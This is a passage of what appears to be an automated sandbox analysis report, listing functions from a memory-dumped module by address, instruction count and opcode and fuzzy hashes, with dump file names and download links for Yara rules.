                                                                                                                                                                              • Opcode ID: d1497de548edd143697d12ba16b1c8d09aa36614285fff9631d1e9283a22b0c1
                                                                                                                                                                              • Instruction ID: 8d2ec24589eed6b4fd6ba857eef8e2bd6df110fe08a7e44ea60b1e06645189ca
                                                                                                                                                                              • Opcode Fuzzy Hash: d1497de548edd143697d12ba16b1c8d09aa36614285fff9631d1e9283a22b0c1
                                                                                                                                                                              • Instruction Fuzzy Hash: 6A410472A101054BDB0CCE7CCA95AEE7BF2AB92330F10C715E931DBAC4D27989458A80
                                                                                                                                                                              Function 6D5D5010 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                              • Opcode ID: 30e786d616c21ef42d72dc735ec0affb77493d5915b60622e20f8d3611444e25
                                                                                                                                                                              • Instruction ID: 983578c4b8a48462d5cf7439ca8cd267376bbd6edb216617eb87b3ae1d5da68f
                                                                                                                                                                              • Opcode Fuzzy Hash: 30e786d616c21ef42d72dc735ec0affb77493d5915b60622e20f8d3611444e25
                                                                                                                                                                              • Instruction Fuzzy Hash: 58A001706422118B9F50AEBA870A30A7ABAAA47AD1F169069A409C6564EB2484909A26
                                                                                                                                                                              Function 6D5B98E0 Relevance: .8, Instructions: 850COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a984d7e96190a25451aa1362388a5d373d49b217620283eb6f6aebf1810fd2ac
                                                                                                                                                                              • Instruction ID: 561ac5ebbf8129ef60f372c371c6837484f90dafb8e3ded93a083ff199bd5982
                                                                                                                                                                              • Opcode Fuzzy Hash: a984d7e96190a25451aa1362388a5d373d49b217620283eb6f6aebf1810fd2ac
                                                                                                                                                                              • Instruction Fuzzy Hash: A8522276A542098FCB0CCEBCC5A57DD7BF2BB96314F208A19D811EB755C73A990A8F01
                                                                                                                                                                              Function 6D5CC900 Relevance: .5, Instructions: 542COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7751e56b3565d3e6700133c3171a3c6c8883e515df824dd619a4bb49650e6b5b
                                                                                                                                                                              • Instruction ID: 59b7d806f13803d571d16fa40ca3c4b9fa7289fc72f2e938927c325f7667e34e
                                                                                                                                                                              • Opcode Fuzzy Hash: 7751e56b3565d3e6700133c3171a3c6c8883e515df824dd619a4bb49650e6b5b
                                                                                                                                                                              • Instruction Fuzzy Hash: FB023972A905018FCF09CEBCE5A53EE77F2AB46320F10D51ED421EB795D72A590A8F12
                                                                                                                                                                              Function 6D5C2FC0 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f2599a7b9402da8ead862814d5b49ea1ef38562956baaf92f6ba136a8ce182bd
                                                                                                                                                                              • Instruction ID: c5f246ab69fbffb1e21d807efbf5b30b07880ee4ce8c707583a04f49ae7e769f
                                                                                                                                                                              • Opcode Fuzzy Hash: f2599a7b9402da8ead862814d5b49ea1ef38562956baaf92f6ba136a8ce182bd
                                                                                                                                                                              • Instruction Fuzzy Hash: A5917972A505098FEF08CFFDC1A53EF7BF2AB46321F10991DC411A7755C22A990ACB52
                                                                                                                                                                              Function 6D5C28D0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5301fbaae4f87ab5fb06b2b7bee7496b73067fe2cecddc1b1f8bec0056b1c883
                                                                                                                                                                              • Instruction ID: 86b3895f792eca90ce4d68af25d708fe2df3cb52842413becd1232c943c0b2d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 5301fbaae4f87ab5fb06b2b7bee7496b73067fe2cecddc1b1f8bec0056b1c883
                                                                                                                                                                              • Instruction Fuzzy Hash: A881E17AA142069FCF08CEBCC5957EEBBF2BB4A314F10981EE851E7740C6399945CB52
                                                                                                                                                                              Function 6D5CC250 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1b815b03f26f2d575cadcc6233bb69560a98bf1219ad83bf32192c217c5923b1
                                                                                                                                                                              • Instruction ID: dfbf121637ee23290a41642fb5789e081dbac4329995811bd332e2fd114f683e
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b815b03f26f2d575cadcc6233bb69560a98bf1219ad83bf32192c217c5923b1
                                                                                                                                                                              • Instruction Fuzzy Hash: 7D810E76A542158FDB09CEECD8A07EEBBF1FB4A310F10981DD402EB760C73999458B26
                                                                                                                                                                              Function 6D5C5060 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 19bff8c262b12250fe17863f62ae0da341e7993db07a4f109174e30836c9ca6d
                                                                                                                                                                              • Instruction ID: dd1d2d29dc63350bb0ca83122191ce6ff456342f032e38de314f59283327b65b
                                                                                                                                                                              • Opcode Fuzzy Hash: 19bff8c262b12250fe17863f62ae0da341e7993db07a4f109174e30836c9ca6d
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B81DE75A242098FCB09CEFCD9847EEBBF2BB8A350F50881ED405E7744D6399D498B52
                                                                                                                                                                              Function 6D5C3D80 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9898be931116b8e2f6c6e230ac784558ec49bee8f36ea86a261c08b1a02e85f5
                                                                                                                                                                              • Instruction ID: 24e52e8d8d52baafab73e1d6a9eac42e410656edbb827862c365d6f1e14cfdad
                                                                                                                                                                              • Opcode Fuzzy Hash: 9898be931116b8e2f6c6e230ac784558ec49bee8f36ea86a261c08b1a02e85f5
                                                                                                                                                                              • Instruction Fuzzy Hash: F0610232A901058FDF09CABCC4A57EE7BF1EB0B325F109A1DD521EB791C22B64058B92
                                                                                                                                                                              Function 6D5C4D90 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 06ae13bcd2e6f6b38a082699cf08459bce1546406ca067fc78488e041289e918
                                                                                                                                                                              • Instruction ID: 1e0ce5f43f408d989a00e3bc0a8bf83904a654c2cb5312df7f68703040892b01
                                                                                                                                                                              • Opcode Fuzzy Hash: 06ae13bcd2e6f6b38a082699cf08459bce1546406ca067fc78488e041289e918
                                                                                                                                                                              • Instruction Fuzzy Hash: 47615C72A805018FDF09DDFCC0953EE3BE2A747361F21991ED960EBB94C2365509CB92
                                                                                                                                                                              Function 6D5CC620 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4d0de2551f0ef301c1990aadf7ddd2a5ebaafd30044331ceaac3534eb17d79bb
                                                                                                                                                                              • Instruction ID: a364b990c58040aa54d0530d437c63752ff16aec8ce0f170c0849681f3fb5c92
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d0de2551f0ef301c1990aadf7ddd2a5ebaafd30044331ceaac3534eb17d79bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 0D819D75E512498FCF09CFACC5906EEBBF1BB8A310F20951AE424A7B50C3359905CB56
                                                                                                                                                                              Function 6D5C3870 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c18fecb9fca95b26cabd35ce233f0b949dbcf679918a7717235767a55f79ab90
                                                                                                                                                                              • Instruction ID: 854331d11248997257e9cf9ea98cdc2a20d9542d5d2b4ed5132822ca273e8ea9
                                                                                                                                                                              • Opcode Fuzzy Hash: c18fecb9fca95b26cabd35ce233f0b949dbcf679918a7717235767a55f79ab90
                                                                                                                                                                              • Instruction Fuzzy Hash: C2610376A5410A8FDF0DCFBCC5D13EE7BB2BB4A310F10961EC51297784CA3A99498B52
                                                                                                                                                                              Function 6D5B5A40 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a8a112230a70a421946a6111a6e9fb0c81318f23841ad4819df0444811766270
                                                                                                                                                                              • Instruction ID: 50348e370a5b17af9cfbf1f6d8a7b8af9cb35b3f2e0e32433a88a38114edd9b7
                                                                                                                                                                              • Opcode Fuzzy Hash: a8a112230a70a421946a6111a6e9fb0c81318f23841ad4819df0444811766270
                                                                                                                                                                              • Instruction Fuzzy Hash: BB61F232A546058FDF0CCE7CC5A57FE7BF2BB46315F209919D821ABA94D33A4A09CB50
                                                                                                                                                                              Function 6D5C4360 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 3c0541d90d414ac21a6dddf5002c156158af61eba4d698689b585d9493e72f8b
                                                                                                                                                                              • Instruction ID: c6501985d05211fe53648db4d603ee4a306aa8811f198da2f978d6d939b44bca
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c0541d90d414ac21a6dddf5002c156158af61eba4d698689b585d9493e72f8b
                                                                                                                                                                              • Instruction Fuzzy Hash: 00515876A545064FDF09CEBCC4D67EF3BF2AB8A320F109A1DC521D7B94C32A554A8B42
                                                                                                                                                                              Function 6D5C7C20 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2fec157843c6193dd1feae81227a05ee1db9128cdbb2ada8b3097710c66272ad
                                                                                                                                                                              • Instruction ID: e90bec0d5eb4b68cc55510b03fccacac21e981f13dffd4426b90ccc5c30a196e
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fec157843c6193dd1feae81227a05ee1db9128cdbb2ada8b3097710c66272ad
                                                                                                                                                                              • Instruction Fuzzy Hash: 3851E172E541068FCF09CEBCC8817EEBBF2BB46350F108919D520E7B54D63A99498B62
                                                                                                                                                                              Function 6D5C7850 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5eb4866b1b8532783687a37f6612872906d4c106b67f96ac39c301f588a22aa9
                                                                                                                                                                              • Instruction ID: f701e2bb4b47a197c3ead5e7a47b207751fab7070674edfe6a237668486103a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb4866b1b8532783687a37f6612872906d4c106b67f96ac39c301f588a22aa9
                                                                                                                                                                              • Instruction Fuzzy Hash: A3510672E541068FDB09CEBCC5D13EE7BF1AB46321F10D919D911EBB50C23A9A49CB92
                                                                                                                                                                              Function 6D5C5C50 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b3cb5aab7720d4c3140aa32d994697df36b3a730023baaad97257d61ae2eb468
                                                                                                                                                                              • Instruction ID: f78007999514f580ad6e373692633a9be633d3a6f10948d4485659a18e656c90
                                                                                                                                                                              • Opcode Fuzzy Hash: b3cb5aab7720d4c3140aa32d994697df36b3a730023baaad97257d61ae2eb468
                                                                                                                                                                              • Instruction Fuzzy Hash: 7751B072A542568FCB09CEFCC9953FE7BB1BB46310F10C91DD412D7784D6298A498792
                                                                                                                                                                              Function 6D5C68F0 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
